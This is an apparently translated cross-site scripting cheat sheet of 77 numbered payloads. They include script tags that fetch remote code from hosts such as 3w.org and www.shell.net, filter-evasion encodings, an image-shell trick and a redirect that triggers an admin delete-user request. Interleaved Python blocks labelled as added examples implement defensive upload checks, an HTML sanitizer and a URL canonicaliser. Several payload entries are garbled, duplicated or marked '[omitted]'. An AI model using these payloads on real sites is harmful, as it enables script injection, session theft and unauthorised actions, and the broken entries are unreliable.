Cross-site image shell

XSS code: <script>alert("")</script>

Put this code on the first line of the shell and rename the shell to a JPG image. When the image-format shell is requested, our shell still executes.
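The trick above only works when the browser is allowed to sniff a served "image" into an HTML document. As an added example (not part of the original post), here is the server-side check a defender would put in front of an upload handler, plus the response headers that stop a renamed script from ever being rendered as markup. The accepted types, the markup heuristic and the sample files are assumptions of this example.

```python
"""Server-side defence against a script file renamed to .jpg (added example,
not from the original post).  Two independent controls, both assumptions of
this example rather than anything the post prescribes:

1. check_image_upload(): the stored bytes must begin with the magic bytes of
   the image type the client claims, and the head of the file must not
   contain markup.
2. upload_response_headers(): serve stored uploads with a fixed Content-Type,
   X-Content-Type-Options: nosniff (so the browser cannot reinterpret an
   "image" as HTML) and a CSP that forbids script even if markup got through.
"""
import re
from typing import Tuple

# Magic-byte prefixes of the image types we accept (well-known file signatures).
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

# Tag openers whose presence in the head of an "image" means it is really markup.
_MARKUP = re.compile(rb"<\s*/?\s*(script|html|head|body|iframe|svg|img|meta)\b", re.I)


def check_image_upload(data: bytes, claimed_type: str, head_len: int = 1024) -> Tuple[bool, str]:
    """Return (accepted, reason) for an upload that claims to be claimed_type."""
    prefixes = MAGIC.get(claimed_type)
    if prefixes is None:
        return False, "unsupported content type"
    if not data.startswith(prefixes):
        return False, "magic bytes do not match claimed type"
    if _MARKUP.search(data[:head_len]):
        return False, "markup found inside image head"
    return True, "ok"


def upload_response_headers(claimed_type: str) -> dict:
    """Response headers for serving a stored upload back to browsers."""
    return {
        "Content-Type": claimed_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed samples.  FAKE_JPG is the post's trick: a script file renamed
# to .jpg.  REAL_JPG is a genuine JFIF head.  POLYGLOT_JPG is a valid JPEG
# start followed by a COM segment that carries markup.
FAKE_JPG = b'<script>alert("")</script>\n' + b"rest of the renamed file"
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 64
POLYGLOT_JPG = b"\xff\xd8\xff\xfe\x00\x20" + b'<script>alert("XSS")</script>'

if __name__ == "__main__":
    for name, blob in (("fake", FAKE_JPG), ("real", REAL_JPG), ("polyglot", POLYGLOT_JPG)):
        print(name, check_image_upload(blob, "image/jpeg"))
```

The markup scan is a heuristic: decoding the upload with an image library and re-saving it is the stronger control, and hosting uploads on a separate origin removes the script-execution impact entirely. `nosniff` is what actually closes the gap the post relies on; the magic-byte check just rejects the obvious cases early.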
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..[omitted]..XSS')>

(11) Embedded tab, splitting the word "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the word "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to apply them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META refresh with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (code points 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash movie that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash movie can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command 2 (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
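Every entry from (3) to (67) defeats a filter that works on the raw text: either the scheme is disguised (case, entities, embedded tab/newline/CR/NUL, leading spaces) or the tag is mangled so a regex never sees a well-formed `<script>`. The defence that survives all of them is to parse the markup, keep only an allowlist of tags and attributes, and judge URL attributes after decoding and stripping the characters a browser ignores. The sanitizer below is an added example, not code from the original post; its tag, attribute and scheme allowlists and the sample fragments are assumptions of the example.

```python
"""Allowlist HTML sanitizer (added example, not from the original post) that
neutralises the vectors above: the javascript: obfuscations of (3)-(19) and
the tag-mangling tricks of (20)-(67).  The tag/attribute allowlist, the
scheme allowlist and the sample fragments are assumptions of this example.
Design: parse with html.parser rather than regexes, emit only allowlisted
tags and attributes, and check URL attributes after decoding entities and
stripping the control characters that browsers ignore inside a scheme.
"""
import html
import re
from html.parser import HTMLParser
from typing import List, Optional

ALLOWED_TAGS = {"a", "b", "i", "p", "br", "img", "ul", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https", "mailto"}

# Code points 0-32, DEL, NBSP and the Unicode spaces (cf. item 47) that a
# browser drops when it reads a scheme, so "jav\tascript" is "javascript".
_STRIP = re.compile(r"[\x00-\x20\x7f\xa0\u2000-\u200a\u3000\ufeff]")


def safe_url(value: str) -> Optional[str]:
    """Return value unchanged if its scheme is allowed or absent, else None."""
    decoded = html.unescape(value)      # &#106;avascript, &#x6A;, &colon; ...
    compact = _STRIP.sub("", decoded)   # embedded tab/newline/CR/NUL/space
    head = re.split(r"[/?#]", compact, maxsplit=1)[0]
    if ":" not in head:
        return value                    # relative URL: no scheme at all
    return value if head.split(":", 1)[0].lower() in SAFE_SCHEMES else None


class Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self._skip: Optional[str] = None   # inside a dropped <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = tag               # drop the element and its body
            return
        if tag not in ALLOWED_TAGS:
            return                         # unknown tag dropped, its text kept
        parts = [f"<{tag}"]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue                   # event handlers, STYLE, DYNSRC ...
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue
            parts.append(f' {name}="{html.escape(value, quote=True)}"')
        parts.append(">")
        self.out.append("".join(parts))

    def handle_endtag(self, tag):
        if tag == self._skip:
            self._skip = None
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip is None:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment: str) -> str:
    """Return a fragment containing only allowlisted tags, attributes and schemes."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed inputs following the patterns listed above.
SAMPLES = [
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    '<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>',
    '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    '<a href="https://example.com/?a=1&amp;b=2" onclick="x()">ok</a>',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", repr(sanitize(s)))
```

Two points of the design carry the weight: text outside allowlisted tags is always re-escaped, so a half-open or doubled tag degrades into harmless text rather than markup, and the scheme test runs on the decoded, whitespace-stripped value but the original value is what gets emitted, so a legitimate `http://` link with an encoded `&amp;` is not rewritten. Protocol-relative and relative links pass the scheme test by design; whether their destination is acceptable is a separate allowlist question.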
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
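Entries (68) to (76) are about disguising where a link points, which defeats any link or redirect allowlist that compares the raw string. The decimal, hex, octal and mixed forms are all the same inet_aton-style address, and the trailing dot and protocol-relative forms are the same host name. As an added example, not part of the original post, the following canonicalises the host before comparison: control characters and spaces are stripped, a scheme-relative link is given a scheme, numeric hosts are reduced to a dotted quad, and the trailing dot and case are removed. The inet_aton rules, the allowlist and the sample links are assumptions of this example.

```python
"""Canonicalise the host of a link before an allowlist comparison (added
example, not from the original post), so the decimal, hex, octal, mixed and
trailing-dot forms in (68)-(76) all collapse to the same value.

Assumptions: the inet_aton dotted-number rules (1 to 4 parts, each part in
decimal, 0x-hex or leading-zero octal, the last part absorbing the remaining
bits) are what browsers apply; the allowlist and sample links are constructed.
"""
import ipaddress
import re
from typing import Optional, Set
from urllib.parse import urlsplit

# Controls and spaces that the mixed-encoding link (73) scatters through the URL.
_WS = re.compile(r"[\x00-\x20\x7f]")


def _part(p: str) -> int:
    """Parse one dotted-address component in decimal, 0x hex or 0-octal."""
    if p[:2].lower() == "0x":
        return int(p[2:] or "0", 16)
    if len(p) > 1 and p[0] == "0":
        return int(p, 8)
    return int(p, 10)


def numeric_host_to_ipv4(host: str) -> Optional[str]:
    """Return a dotted quad if host is an inet_aton-style number, else None."""
    parts = host.rstrip(".").split(".")
    if not parts or len(parts) > 4:
        return None
    try:
        nums = [_part(p) for p in parts]
    except ValueError:
        return None
    # All but the last part must fit one byte; the last fills what is left.
    last_bits = 8 * (5 - len(parts))
    if any(n > 0xFF for n in nums[:-1]) or nums[-1] >= 1 << last_bits:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << last_bits) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def canonical_host(link: str) -> Optional[str]:
    """Host of a link after stripping controls, resolving '//' links, folding
    case, dropping the trailing dot and normalising numeric IPv4 forms."""
    compact = _WS.sub("", link)
    if compact.startswith("//"):
        compact = "http:" + compact        # scheme-relative, item (74)
    host = urlsplit(compact).hostname
    if host is None:
        return None
    host = host.rstrip(".").lower()        # absolute DNS name, item (76)
    return numeric_host_to_ipv4(host) or host


def link_allowed(link: str, allowed_hosts: Set[str]) -> bool:
    """Allowlist check done on the canonical host, not on the raw text."""
    host = canonical_host(link)
    return host is not None and host in allowed_hosts


# Constructed sample links following the forms listed above.
SAMPLE_LINKS = [
    "http://3232235521",
    "http://0xc0.0xa8.0x00.0x01",
    "http://0300.0250.0000.0001",
    "h\ntt p://6 6.000146.0x7.147/",
    "http://www.google.com./",
    "//www.google.com/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(repr(link), "->", canonical_host(link))
```

Note that (75) is deliberately not collapsed: `google.com` and `www.google.com` are different hosts, so an allowlist has to list each form it accepts. The javascript: link in (77) is a scheme problem rather than a host problem and is handled by scheme allowlisting, not by this routine.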